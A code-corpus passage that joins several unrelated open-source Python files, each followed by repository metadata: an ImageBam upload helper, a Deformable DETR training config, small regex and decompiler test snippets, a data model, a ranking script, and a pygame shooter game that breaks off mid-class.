logging.error(error_message.string.strip())
raise ImageHostError('{site} login failed!'.format(site=self))
def upload(self, image_paths):
if not image_paths:
raise ImageHostError('No files to upload!')
for image in image_paths:
if (not os.path.isfile(image)) or (not image.endswith('.png')):
msg = 'The file "{file}" does not exist or is not a PNG image.'
raise ImageHostError(msg.format(file=image))
self.login()
# Upload files
url = 'http://www.imagebam.com/sys/upload/save'
data = {
'content_type': '0',
'thumb_size': self.thumbnail_size,
'thumb_aspect_ratio': 'resize',
'thumb_file_type': self.thumb_file_type,
'gallery_options': self.gallery_options,
'gallery_title': '',
'gallery_description': ''
}
files = []
file_objects = []
for n in range(len(image_paths)):
img_num = str(n + 1).zfill(3)
file_objects.append(io.open(image_paths[n], mode='rb'))
files.append((
'file[]',
(
'image{number}.png'.format(number=img_num),
file_objects[n]
)
))
logging.info('Uploading screenshots to ImageBam...')
response = self.session.post(url, data=data, files=files)
response.raise_for_status()
logging.info('Screenshot upload completed: http://www.imagebam.com/gallery-organizer')
for file_obj in file_objects:
file_obj.close()
self._html = response.text
table_regex = re.compile(r'(<table style=\'width:100%;\'>)((.|\s)*?)(</table>)')
table_html = ''.join(table_regex.findall(self._html)[0])
bbcode_regex = re.compile(r'\[URL=.*?\[/URL]')
self.bbcode_links = bbcode_regex.findall(table_html)
link_regex = re.compile(r'\<a href=.*?></a>')
self.html_links = link_regex.findall(table_html)
url_regex = re.compile(r'http://www.imagebam.com/.*?[a-z0-9]{12,18}(?=")')
self.urls = url_regex.findall(''.join(self.html_links))
return True
|
hwkns/macguffin
|
image_hosts/imagebam.py
|
Python
|
gpl-3.0
| 3,640
|
_base_ = [
'../_base_/datasets/coco_detection.py', '../_base_/default_runtime.py'
]
model = dict(
type='DeformableDETR',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=False),
norm_eval=True,
style='pytorch',
init_cfg=dict(type='Pretrained', checkpoint='torchvision://resnet50')),
neck=dict(
type='ChannelMapper',
in_channels=[512, 1024, 2048],
kernel_size=1,
out_channels=256,
act_cfg=None,
norm_cfg=dict(type='GN', num_groups=32),
num_outs=4),
bbox_head=dict(
type='DeformableDETRHead',
num_query=300,
num_classes=80,
in_channels=2048,
sync_cls_avg_factor=True,
as_two_stage=False,
transformer=dict(
type='DeformableDetrTransformer',
encoder=dict(
type='DetrTransformerEncoder',
num_layers=6,
transformerlayers=dict(
type='BaseTransformerLayer',
attn_cfgs=dict(
type='MultiScaleDeformableAttention', embed_dims=256),
feedforward_channels=1024,
ffn_dropout=0.1,
operation_order=('self_attn', 'norm', 'ffn', 'norm'))),
decoder=dict(
type='DeformableDetrTransformerDecoder',
num_layers=6,
return_intermediate=True,
transformerlayers=dict(
type='DetrTransformerDecoderLayer',
attn_cfgs=[
dict(
type='MultiheadAttention',
embed_dims=256,
num_heads=8,
dropout=0.1),
dict(
type='MultiScaleDeformableAttention',
embed_dims=256)
],
feedforward_channels=1024,
ffn_dropout=0.1,
operation_order=('self_attn', 'norm', 'cross_attn', 'norm',
'ffn', 'norm')))),
positional_encoding=dict(
type='SinePositionalEncoding',
num_feats=128,
normalize=True,
offset=-0.5),
loss_cls=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=2.0),
loss_bbox=dict(type='L1Loss', loss_weight=5.0),
loss_iou=dict(type='GIoULoss', loss_weight=2.0)),
# training and testing settings
train_cfg=dict(
assigner=dict(
type='HungarianAssigner',
cls_cost=dict(type='FocalLossCost', weight=2.0),
reg_cost=dict(type='BBoxL1Cost', weight=5.0, box_format='xywh'),
iou_cost=dict(type='IoUCost', iou_mode='giou', weight=2.0))),
test_cfg=dict(max_per_img=100))
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
# train_pipeline, NOTE the img_scale and the Pad's size_divisor is different
# from the default setting in mmdet.
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(
type='AutoAugment',
policies=[
[
dict(
type='Resize',
img_scale=[(480, 1333), (512, 1333), (544, 1333),
(576, 1333), (608, 1333), (640, 1333),
(672, 1333), (704, 1333), (736, 1333),
(768, 1333), (800, 1333)],
multiscale_mode='value',
keep_ratio=True)
],
[
dict(
type='Resize',
# The radio of all image in train dataset < 7
# follow the original impl
img_scale=[(400, 4200), (500, 4200), (600, 4200)],
multiscale_mode='value',
keep_ratio=True),
dict(
type='RandomCrop',
crop_type='absolute_range',
crop_size=(384, 600),
allow_negative_crop=True),
dict(
type='Resize',
img_scale=[(480, 1333), (512, 1333), (544, 1333),
(576, 1333), (608, 1333), (640, 1333),
(672, 1333), (704, 1333), (736, 1333),
(768, 1333), (800, 1333)],
multiscale_mode='value',
override=True,
keep_ratio=True)
]
]),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=1),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels'])
]
# test_pipeline, NOTE the Pad's size_divisor is different from the default
# setting (size_divisor=32). While there is little effect on the performance
# whether we use the default setting or use size_divisor=1.
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=1),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img'])
])
]
data = dict(
samples_per_gpu=2,
workers_per_gpu=2,
train=dict(filter_empty_gt=False, pipeline=train_pipeline),
val=dict(pipeline=test_pipeline),
test=dict(pipeline=test_pipeline))
# optimizer
optimizer = dict(
type='AdamW',
lr=2e-4,
weight_decay=0.0001,
paramwise_cfg=dict(
custom_keys={
'backbone': dict(lr_mult=0.1),
'sampling_offsets': dict(lr_mult=0.1),
'reference_points': dict(lr_mult=0.1)
}))
optimizer_config = dict(grad_clip=dict(max_norm=0.1, norm_type=2))
# learning policy
lr_config = dict(policy='step', step=[40])
runner = dict(type='EpochBasedRunner', max_epochs=50)
|
open-mmlab/mmdetection
|
configs/deformable_detr/deformable_detr_r50_16x2_50e_coco.py
|
Python
|
apache-2.0
| 6,478
|
#coding:utf-8
import re
# 将正则表达式编译成Pattern对象
pattern = re.compile(r'\d+')
# 使用re.match匹配文本,获得匹配结果,无法匹配时将返回None
result1 = re.search(pattern,'abc192edf')
if result1:
print result1.group()
else:
print '匹配失败1'
|
qiyeboy/SpiderBook
|
ch04/4.2.2.2.py
|
Python
|
mit
| 288
|
# Copyright (C) 2010-2014 CEA/DEN, EDF R&D
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : webmaster.salome@opencascade.com
#
# This case corresponds to: /visu/MeshPresentation/F1 case
# Create Mesh Presentation for all data of the given MED file
import sys
from paravistest import datadir, pictureext, get_picture_dir
from presentations import CreatePrsForFile, PrsTypeEnum
import pvserver as paravis
# Create presentations
myParavis = paravis.myParavis
# Directory for saving snapshots
picturedir = get_picture_dir("MeshPresentation/F1")
file = datadir + "ml.med"
print " --------------------------------- "
print "file ", file
print " --------------------------------- "
print "CreatePrsForFile..."
CreatePrsForFile(myParavis, file, [PrsTypeEnum.MESH], picturedir, pictureext)
|
FedoraScientific/salome-paravis
|
test/VisuPrs/MeshPresentation/F1.py
|
Python
|
lgpl-2.1
| 1,515
|
from grano.core import db, url_for
from grano.model.common import UUIDBase
from grano.model.property import Property, PropertyBase
class Relation(db.Model, UUIDBase, PropertyBase):
__tablename__ = 'grano_relation'
#PropertyClass = RelationProperty
schema_id = db.Column(db.Integer, db.ForeignKey('grano_schema.id'),
index=True)
source_id = db.Column(db.Unicode, db.ForeignKey('grano_entity.id'),
index=True)
target_id = db.Column(db.Unicode, db.ForeignKey('grano_entity.id'),
index=True)
project_id = db.Column(db.Integer, db.ForeignKey('grano_project.id'))
author_id = db.Column(db.Integer, db.ForeignKey('grano_account.id'))
properties = db.relationship(Property,
order_by=Property.created_at.desc(),
cascade='all, delete, delete-orphan',
backref='relation', lazy='dynamic')
def to_dict_base(self):
return {
'id': self.id,
'properties': {},
'project': self.project.to_dict_short(),
'api_url': url_for('relations_api.view', id=self.id),
'schema': self.schema.to_dict_index(),
'source': self.source.to_dict_index(),
'target': self.target.to_dict_index()
}
def to_dict(self):
data = self.to_dict_base()
for prop in self.active_properties:
name, prop = prop.to_dict_kv()
data['properties'][name] = prop
return data
def to_dict_index(self):
data = self.to_dict_base()
for prop in self.active_properties:
name, prop = prop.to_dict_kv()
data['properties'][name] = prop
return data
class BidiRelation(db.Model):
__tablename__ = 'grano_relation_bidi'
id = db.Column(db.Unicode, primary_key=True)
created_at = db.Column(db.DateTime)
updated_at = db.Column(db.DateTime)
reverse = db.Column(db.Boolean)
relation_id = db.Column(db.Unicode)
source_id = db.Column(db.Unicode)
target_id = db.Column(db.Unicode)
project_id = db.Column(db.Integer)
schema_id = db.Column(db.Integer)
author_id = db.Column(db.Integer)
|
granoproject/grano
|
grano/model/relation.py
|
Python
|
mit
| 2,276
|
# Tests:
# trystmt ::= SETUP_EXCEPT suite_stmts_opt POP_BLOCK
# try_middle COME_FROM
# except_stmt ::= except
try:
x = 1
except:
pass
# Tests:
# trystmt ::= SETUP_EXCEPT suite_stmts_opt POP_BLOCK
# try_middle COME_FROM
# except_stmt ::= except_cond1 except_suite
# except_suite ::= ...
try:
x = 1
except ImportError:
pass
try:
x = 2
except ImportError:
x = 3
finally:
x = 4
try:
x = 1
except ImportError as e:
x = 2
|
moagstar/python-uncompyle6
|
test/simple_source/exception/01_try_except.py
|
Python
|
mit
| 495
|
import numpy as np
import tools, minimizers, montecarlo
class FeatureSet:
"""
Basic class to input feature lists and perform basic operations on the lists.
Can load data from a CSV file with a header row such as "candidate, list1, list2, ..."
left-most column stores the names for candidates. Can perform Z-scaling and Min-Max
scaling on data for multi-objective optimization.
"""
def __init__(self):
print "Initialized a set of feature lists"
def load_data(self, filename):
f = open(filename, 'r')
self.headers = f.readline().rstrip('\n').split(',')
self.c_l = [] # candidate list m candidates
self.a_l = [] # attribute list, m x n
for i in range(len(self.headers) - 1):
self.a_l.append([])
while True:
l = f.readline().rstrip('\n').split(',')
if len(l) <= 1:
break
self.c_l.append(l[0])
for i in range(0, len(l) - 1):
self.a_l[i].append(float(l[i + 1]))
print "Found %d attributes, and %d candidates to rank." % ((len(self.headers) - 1), len(self.a_l[0]))
self.call_ranks()
def call_ranks(self):
self.a_ranks = tools.get_ranks(self.a_l)
def Z_scale(self):
self.z_scaled = []
for i in self.a_l:
mean, std = np.mean(i), np.std(i)
self.z_scaled.append([(x - mean) / std for x in i])
self.z_scaled = np.array(self.z_scaled)
def MinMax_scale(self):
self.minmax_scaled = []
for i in self.a_l:
min, max = np.amin(i), np.amax(i)
self.minmax_scaled.append([(x - min) / (max - min) for x in i])
self.minmax_scaled = np.array(self.minmax_scaled)
if __name__ == "__main__":
new_test = FeatureSet()
new_test.load_data('data_files/toyset2')
print new_test.headers
print new_test.c_l
new_test.Z_scale()
new_test.MinMax_scale()
mo = minimizers.RandomWeights(new_test)
mo.start()
mc = minimizers.RankMC4(new_test)
mc.start()
brute = minimizers.RankBrute(new_test)
brute.start()
borda = minimizers.RankBorda(new_test)
borda.start()
random = minimizers.RankRandom(new_test)
random.start()
mcmc = montecarlo.CrossEntropy(new_test, 40)
x = mcmc.start()
#
|
aykol/PyRank
|
pyrank/rank.py
|
Python
|
mit
| 2,338
|
# -*- coding: utf-8 -*-
"""
003_static_blit_pretty.py
static blitting and drawing (pretty version)
url: http://thepythongamebook.com/en:part2:pygame:step003
author: horst.jens@spielend-programmieren.at
licence: gpl, see http://www.gnu.org/licenses/gpl.html
works with pyhton3.4 and python2.7
Blitting a surface on a static position
Drawing a filled circle into ballsurface.
Blitting this surface once.
introducing pygame draw methods
The ball's rectangular surface is black because the background
color of the ball's surface was never defined nor filled."""
## to do fix buggy movement (up=down) ai movement for ketturkat ##
from __future__ import print_function, division
import pygame
import os
import random
import math
import sys
GRAD = math.pi / 180 # 2 * pi / 360 # math module needs Radiant instead of Grad
def radians_to_degrees(radians):
return(radians / math.pi) * 180.0
def degrees_to_radians(degrees):
return degrees * (math.pi / 180.0)
def showkeys():
lines = ["Movement = cursor keys",
"v = Spawn snowman turret",
"space = shoot"]
return lines
def write(msg="paolo is cool", color=(0,0,0)):
"""write text into pygame surfaces"""
myfont = pygame.font.SysFont("None", 32)
mytext = myfont.render(msg, True, color)
mytext = mytext.convert_alpha()
return mytext
def elastic_collision(sprite1, sprite2):
"""elasitc collision between 2 sprites (calculated as disc's).
The function alters the dx and dy movement vectors of both sprites.
The sprites need the property .mass, .radius, .x, .y, .dx, dy
physic function from Leonard Michlmayr
"""
# here we do some physics: the elastic
# collision
#
# first we get the direction of the push.
# Let's assume that the sprites are disk
# shaped, so the direction of the force is
# the direction of the distance.
dirx = sprite1.x - sprite2.x
diry = sprite1.x - sprite2.y
#
# the velocity of the centre of mass
sumofmasses = sprite1.mass + sprite2.mass
sx = (sprite1.dx * sprite1.mass + sprite2.dx * sprite2.mass) / sumofmasses
sy = (sprite1.dy * sprite1.mass + sprite2.dy * sprite2.mass) / sumofmasses
# if we sutract the velocity of the centre
# of mass from the velocity of the sprite,
# we get it's velocity relative to the
# centre of mass. And relative to the
# centre of mass, it looks just like the
# sprite is hitting a mirror.
#
bdxs = sprite2.dx - sx
bdys = sprite2.dy - sy
cbdxs = sprite1.dx - sx
cbdys = sprite1.dy - sy
# (dirx,diry) is perpendicular to the mirror
# surface. We use the dot product to
# project to that direction.
distancesquare = dirx * dirx + diry * diry
if distancesquare == 0:
# no distance? this should not happen,
# but just in case, we choose a random
# direction
dirx = random.randint(0,11) - 5.5
diry = random.randint(0,11) - 5.5
distancesquare = dirx * dirx + diry * diry
dp = (bdxs * dirx + bdys * diry) # scalar product
dp /= distancesquare # divide by distance * distance.
cdp = (cbdxs * dirx + cbdys * diry)
cdp /= distancesquare
# We are done. (dirx * dp, diry * dp) is
# the projection of the velocity
# perpendicular to the virtual mirror
# surface. Subtract it twice to get the
# new direction.
#
# Only collide if the sprites are moving
# towards each other: dp > 0
if dp > 0:
sprite2.dx -= 2 * dirx * dp
sprite2.dy -= 2 * diry * dp
sprite1.dx -= 2 * dirx * cdp
sprite1.dy -= 2 * diry * cdp
# ----------- classes ------------------------
class Text(pygame.sprite.Sprite):
"""a pygame Sprite displaying text"""
def __init__(self, msg="The Ketturkat Game Book", color=(0,0,0)):
self.groups = PygView.allgroup
self._layer = 1
pygame.sprite.Sprite.__init__(self, self.groups)
self.newmsg(msg,color)
def update(self, time):
pass # allgroup sprites need update method that accept time
def newmsg(self, msg, color=(0,0,0)):
self.image = write(msg,color)
self.rect = self.image.get_rect()
class Lifebar(pygame.sprite.Sprite):
"""shows a bar with the hitpoints of a sprite with a given bossnumber, the Lifebar class can
identify the BOSS (FLYING OBJECT sprite) with this codeline:
PlayerSprite.objects[bossnumber] """
def __init__(self, boss):
#self.groups = PygView.allgroup
self.boss = boss
self._layer = self.boss._layer
pygame.sprite.Sprite.__init__(self, self.groups)
self.oldpercent = 0
self.height=7
self.color=(94,76,29)
self.bossdistance=10
self.paint()
def paint(self):
self.image = pygame.Surface((self.boss.rect.width,self.height))
self.image.set_colorkey((0,0,0)) # black transparent
pygame.draw.rect(self.image, self.color, (0,0,self.boss.rect.width,self.height),1)
self.rect = self.image.get_rect()
def update(self, seconds):
self.room = self.boss.room
self.percent = self.boss.hitpoints / self.boss.hitpointsfull * 1.0
if self.percent != self.oldpercent:
self.paint() # important ! boss.rect.width may have changed (because rotating)
pygame.draw.rect(self.image, (0,0,0), (1,1,self.boss.rect.width-2,self.height-2)) # fill black
pygame.draw.rect(self.image, self.color, (1,1,
int(self.boss.rect.width * self.percent),self.height-2),0) # fill green
self.oldpercent = self.percent
self.rect.centerx = self.boss.rect.centerx
self.rect.centery = self.boss.rect.centery - self.boss.rect.height /2 - self.bossdistance
if self.boss.hitpoints < 1: #check if boss is still alive
self.kill() # kill the hitbar
def draw_text(self, text):
"""Center text in window
"""
fw, fh = self.font.size(text)
surface = self.font.render(text, True, (0, 0, 0))
self.screen.blit(surface, (50,150))
class Fragment(pygame.sprite.Sprite):
"""generic Fragment class. Inherits to blue Fragment (implosion),
red Fragment (explosion), smoke (black) and shots (purple)"""
def __init__(self, x,y, room, layer = 9):
self._layer = layer
self.room = room
pygame.sprite.Sprite.__init__(self, self.groups)
self.pos = [x,y]
self.fragmentmaxspeed = 1500# try out other factors !
self.dx = (random.random() - 0.5) * self.fragmentmaxspeed
self.dy = (random.random() - 0.5) * self.fragmentmaxspeed
self.init2()
def init2(self): # split the init method into 2 parts for better access from subclasses
self.color=(128,0,0)
self.lifetime = random.random() * 6
self.image = pygame.Surface((10,10))
self.image.set_colorkey((0,0,0)) # black transparent
pygame.draw.circle(self.image, self.color, (5,5), random.randint(2,5))
self.image = self.image.convert_alpha()
self.rect = self.image.get_rect()
self.rect.center = self.pos #if you forget this line the sprite sit in the topleft corner
self.time = 0.0
def update(self, seconds):
self.time += seconds
if self.time > self.lifetime:
self.kill()
self.pos[0] += self.dx * seconds
self.pos[1] += self.dy * seconds
self.rect.centerx = round(self.pos[0],0)
self.rect.centery = round(self.pos[1],0)
class Doenertier (pygame.sprite.Sprite):
"""A yummy animal made out of pure döner and extra spicy, juicy chicken meat"""
def __init__(self, room):
self._layer = 8
self.room = room
pygame.sprite.Sprite.__init__(self, self.groups)
self.hitpoints = 50.0
self.hitpointsfull = 50
self.x = random.randint(0,PygView.width)
self.y = random.randint(0,PygView.height)
self.color = (52,100,81)
self.image = pygame.Surface((30,60))
pygame.draw.circle(self.image, self.color, (15,20), 7)
pygame.draw.circle(self.image, self.color, (15,60), 22)
self.image.set_colorkey((0,0,0)) # black transparent
self.image = self.image.convert_alpha()
self.rect = self.image.get_rect()
self.rect.center = (self.x, self.y)
self.sniffrange = 80
self.dx = 0
self.dy = 0
self.speed = 20
Lifebar(self)
def update(self, seconds):
#distance to player
#if
distx=self.x - PygView.ferris.x
disty=self.y - PygView.ferris.y
dist = (distx**2+disty**2)**0.5
if dist < self.sniffrange:
if self.x > PygView.ferris.x:
self.dx = self.speed
elif self.x < PygView.ferris.x:
self.dx = -self.speed
if self.y > PygView.ferris.y:
self.dy = self.speed
elif self.y < PygView.ferris.y:
self.dy = -self.speed
else:
#random movement
self.dx = random.choice((-1,0,1))*self.speed
self.dy = random.choice((-1,0,1))*self.speed
if self.hitpoints < self.hitpointsfull:
self.hitpoints += 0.0
self.x += self.dx * seconds
self.y += self.dy * seconds
self.rect.center = (self.x, self.y)
if self.hitpoints <1:
self.kill()
if self.x <0 or self.y<0 or self.x > PygView.width or self.y > PygView.height:
self.hitpoints = 0
self.kill()
class EvilSnowman (pygame.sprite.Sprite):
"""an evil snowman turret"""
def __init__(self, room):
self.room = room
self._layer = 8
pygame.sprite.Sprite.__init__(self, self.groups)
self.hitpoints = 120.0
self.hitpointsfull = 120.0
self.x = random.randint(0,PygView.width)
self.y = random.randint(0,PygView.height)
self.color = (200,20,200)
self.image = pygame.Surface((30,60))
pygame.draw.circle(self.image, self.color, (15,20), 7)
pygame.draw.circle(self.image, self.color, (15,40), 15)
self.image.set_colorkey((0,0,0)) # black transparent
self.image = self.image.convert_alpha()
self.rect = self.image.get_rect()
self.rect.center = (self.x, self.y)
Lifebar(self)
def update(self, seconds):
if random.random()< 0.01:
Bullet(self,"1", room=self.room) #0 silas #1 ferris
if self.hitpoints <1:
self.kill()
class EvilDoge (pygame.sprite.Sprite):
"""an evil doge which follows you"""
def __init__(self, room):
self._layer = 8
self.room = room
pygame.sprite.Sprite.__init__(self, self.groups)
self.hitpoints = 10.0
self.hitpointsfull = random.randint(100.0,150.0)
self.x = random.randint(0,PygView.width)
self.y = random.randint(0,PygView.height)
self.color = (40,151,64)
self.image = pygame.Surface((30,60))
pygame.draw.circle(self.image, self.color, (15,20), 7)
pygame.draw.circle(self.image, self.color, (15,40), 15)
pygame.draw.circle(self.image, self.color, (15,60), 22)
self.image.set_colorkey((0,0,0)) # black transparent
self.image = self.image.convert_alpha()
self.rect = self.image.get_rect()
self.rect.center = (self.x, self.y)
self.sniffrange = 100
self.dx = 0
self.dy = 0
self.speed = 40
Lifebar(self)
def update(self, seconds):
#distance to player
distx=self.x - PygView.ferris.x
disty=self.y - PygView.ferris.y
dist = (distx**2+disty**2)**0.5
if dist < self.sniffrange:
if random.random()< 0.08:
Bullet(self,"1", room=self.room) #0 silas #1 ferris
if self.x > PygView.ferris.x:
self.dx = -self.speed
elif self.x < PygView.ferris.x:
self.dx = self.speed
if self.y > PygView.ferris.y:
self.dy = -self.speed
elif self.y < PygView.ferris.y:
self.dy = self.speed
else:
#random movement
self.dx = random.choice((-1,0,1))*self.speed
self.dy = random.choice((-1,0,1))*self.speed
if self.hitpoints < self.hitpointsfull:
self.hitpoints += 0.1
self.x += self.dx * seconds
self.y += self.dy * seconds
self.rect.center = (self.x, self.y)
if self.hitpoints <1:
self.kill()
class Bullet(pygame.sprite.Sprite):
"""A projectile"""
def __init__(self, boss ,direction, room):
self._layer = 9
self.room = room
pygame.sprite.Sprite.__init__(self, self.groups)
self.room = room
self.direction = direction
self.speed = 10 + random.random() *100
self.boss = boss
self.x = self.boss.x
self.y = self.boss.y
self.lifetime = 0.0
self.maxtime = 6.0
self.target = False
if self.direction == "up":
self.dx=0
self.dy=-self.speed
elif self.direction == "down":
self.dx=0
self.dy=self.speed
elif self.direction == "left":
self.dx=-self.speed
self.dy=0
elif self.direction == "right":
self.dx=self.speed
self.dy=0
else:
self.targetnr = int(direction)
#self.dx=random.random()*self.speed
#self.dy=random.random()*self.speed
self.target = PlayerSprite.objects[self.targetnr]
self.ix = self.target.x - self.x
self.iy = self.target.y - self.y
self.angle = radians_to_degrees(math.atan2(self.iy, -self.ix))+90
self.ddx = - math.sin(self.angle * GRAD)
self.ddy = - math.cos(self.angle * GRAD)
self.dx = self.ddx * self.speed
self.dy = self.ddy * self.speed
self.color=(random.randint(0,255),random.randint(0,255),random.randint(0,255))
self.lifetime = random.random() * 6
self.image = pygame.Surface((10,10))
self.image.set_colorkey((0,0,0)) # black transparent
pygame.draw.circle(self.image, self.color, (5,5), 3)
self.image = self.image.convert_alpha()
self.rect = self.image.get_rect()
self.rect.center = (self.x, self.y)
def update(self, seconds):
self.lifetime += seconds # doppelpunkt de
self.x += self.dx * seconds
self.y += self.dy * seconds
self.rect.center = (self.x, self.y)
if self.lifetime > self.maxtime:
self.kill()
class PlayerSprite(pygame.sprite.Sprite):
"""generic Bird class, to be called from SmallBird and BigBird"""
image=[] # list of all images
number = 0
objects={}
def __init__(self, area, layer = 4,hitpoints=100,imagenr=0,grid=50,ai=0, room=0):
#self.groups = PygView.allgroup, PygView.gravitygroup # assign groups
self._layer = layer # assign level
#self.layer = layer
self.room = room
pygame.sprite.Sprite.__init__(self, self.groups ) #call parent class. NEVER FORGET !
#self.area = PygView.screen.get_rect()
self.area = area
self.hitpoints = PygView.hitpoints
self.hitpointsfull = PygView.hitpointsfull
self.rotatespeed = 10.0
self.speed = 70.0
self.x= 0
self.y= 0
self.ai = ai
self.targetx = 0
self.targety = 0
self.oldx = 0
self.oldy = 0
self.automove = ""
self.direction = "right"
self.grid=grid
self.gridmaxx=self.area.width //grid
self.gridmaxy=self.area.height //grid
self.ddx = 0.0
self.ddy = 0.0
self.image = PlayerSprite.image[imagenr]
self.image0 = PlayerSprite.image[imagenr]
self.hitpoints = float(PygView.hitpoints) # actual hitpoints
self.hitpointsfull = float(PygView.hitpointsfull) # maximal hitpoints
self.rect = self.image.get_rect()
self.radius = max(self.rect.width, self.rect.height) / 2.0
self.dx = 0 # wait at the beginning
self.dy = 0
#self.waittime = Bird.waittime # 1.0 # one second
#self.lifetime = 0.0
self.rect.center = (-100,-100) # out of visible screen
self.frags = 125 # number of framgents if Bird is killed
self.number = PlayerSprite.number # get my personal Birdnumber
PlayerSprite.number+= 1 # increase the number for next Bird
PlayerSprite.objects[self.number] = self # store myself into the Bird dictionary
#print("my number %i Bird number %i and i am a %s " % (self.number, Bird.number, getclassname(self)))
#-------------------physic------------------
self.mass = 100.0
self.angle = 0.0
#self.boostspeed = 10 # speed to fly upward
#self.boostmax = 0.9 # max seconds of "fuel" for flying upward
#self.boostmin = 0.4 # min seconds of "fuel" for flying upward
#self.boosttime = 0.0 # time (fuel) remaining
#warpsound.play()
#for _ in range(8):
# BlueFragment(self.pos) # blue Frags
def left(self):
self.oldx=self.x
self.oldy=self.y
#self.x -= self.grid
self.targetx = self.x - self.grid
self.automove = "left"
def right(self):
self.oldx=self.x
self.oldy=self.y
#self.x += self.grid
self.targetx = self.x + self.grid
self.automove = "right"
def up(self):
self.oldy=self.y
self.oldx=self.x
#self.y -= self.grid
self.targety = self.y - self.grid
self.automove = "up"
def down(self):
self.oldy=self.y
self.oldx=self.x
#self.y += self.grid
self.targety = self.y + self.grid
self.automove = "down"
def kill(self):
PlayerSprite.objects.pop(self.number)
pygame.sprite.Sprite.kill(self) # kill the actual Bird
def speedcheck(self):
#if abs(self.dx) > BIRDSPEEDMAX:
# self.dx = BIRDSPEEDMAX * (self.dx/abs(self.dx)) # dx/abs(dx) is 1 or -1
#if abs(self.dy) > BIRDSPEEDMAX:
# self.dy = BIRDSPEEDMAX * (self.dy/abs(self.dy))
#if abs(self.dx) > 0 :
# self.dx *= FRICTION # make the Sprite slower over time
#if abs(self.dy) > 0 :
# self.dy *= FRICTION
pass
def gridcheck(self):
if self.x < self.grid //2:
self.x = self.grid //2
if self.x > self.grid * self.gridmaxx:
self.x = self.grid * self.gridmaxx
if self.y < self.grid //2:
self.y = self.grid //2
if self.y > self.grid * self.gridmaxy:
self.y = self.grid * self.gridmaxy
def areacheck(self):
if not self.area.contains(self.rect):
# --- compare self.rect and area.rect
if self.x + self.rect.width/2 > self.area.right:
self.x = self.area.right - self.rect.width/2
self.dx *= -0.5 # bouncing off but loosing speed
if self.x - self.rect.width/2 < self.area.left:
self.x = self.area.left + self.rect.width/2
self.dx *= -0.5 # bouncing off the side but loosing speed
if self.y + self.rect.height/2 > self.area.bottom:
self.y = self.area.bottom - self.rect.height/2
self.dy *= -0.5 # bouncing off the ground
if self.y - self.rect.height/2 < self.area.top:
self.y = self.area.top + self.rect.height/2
self.dy *= -0.5 # stop when reaching the sky
def update(self, seconds):
keys=pygame.key.get_pressed()
self.ddx = 0.0
self.ddy = 0.0
if keys[pygame.K_w]: # forward
self.ddx = -math.sin(self.angle*GRAD)
self.ddy = -math.cos(self.angle*GRAD)
# Smoke(self.rect.center, -self.ddx , -self.ddy )
if keys[pygame.K_s]: # backward
self.ddx = +math.sin(self.angle*GRAD)
self.ddy = +math.cos(self.angle*GRAD)
# Smoke(self.rect.center, -self.ddx, -self.ddy )
if keys[pygame.K_e]: # right side
self.ddx = +math.cos(self.angle*GRAD)
self.ddy = -math.sin(self.angle*GRAD)
# Smoke(self.rect.center, -self.ddx , -self.ddy )
if keys[pygame.K_q]: # left side
self.ddx = -math.cos(self.angle*GRAD)
self.ddy = +math.sin(self.angle*GRAD)
# Smoke(self.rect.center, -self.ddx , -self.ddy )
# ------------- movement-------------------------------------
if self.automove != "":
if self.ai == 1:
self.automove = random.choice(("up","down","left","right"))
if self.automove == "right":
if self.x < self.targetx:
self.dx = self.speed
else:
self.dx = 0
self.x = self.targetx
self.automove = ""
elif self.automove == "left":
if self.x > self.targetx:
self.dx = -self.speed
else:
self.dx = 0
self.x = self.targetx
self.automove = ""
if self.automove == "up":
if self.y > self.targety:
self.dy = -self.speed
else:
self.dy = 0
self.y = self.targety
self.automove = ""
elif self.automove == "down":
if self.y < self.targety:
self.dy = self.speed
else:
self.dy = 0
self.y = self.targety
self.automove = ""
self.dx += self.ddx * self.speed
self.dy += self.ddy * self.speed
self.x += self.dx * seconds
self.y += self.dy * seconds
#self.speedcheck()
self.areacheck() # ------- check if Bird out of screen
self.oldangle = self.angle
if keys[pygame.K_a]: # left turn , counterclockwise
self.angle += self.rotatespeed
if keys[pygame.K_d]: # right turn, clockwise
self.angle -= self.rotatespeed
# ------------- rotate ------------------
#if self.angle != self.oldangle:
self.oldcenter = self.rect.center
self.image = pygame.transform.rotate(self.image0, self.angle)
self.rect = self.image.get_rect()
self.rect.center = self.oldcenter
#--------- rotate into direction of movement ------------
#self.angle = math.atan2(-self.dx, -self.dy)/math.pi*180.0
#self.image = pygame.transform.rotozoom(self.image0,self.angle,1.0)
#--- calculate new position on screen -----
self.gridcheck()
self.rect.centerx = round(self.x,0)
self.rect.centery = round(self.y,0)
if self.hitpoints <= 0:
self.kill()
class PygView(object):
def __init__(self, width=650, height=400, hitpoints=200.0, hitpointsfull=200.0, fps=60):
"""Initialize pygame, window, background, font,...
default arguments
"""
pygame.mixer.pre_init(44100, -16, 2, 2048) # setup mixer to avoid sound lag
pygame.init()
pygame.display.set_caption("Press ESC to quit")
self.width = width
self.height = height
PygView.width = width
PygView.height = height
PygView.hitpoints = hitpoints
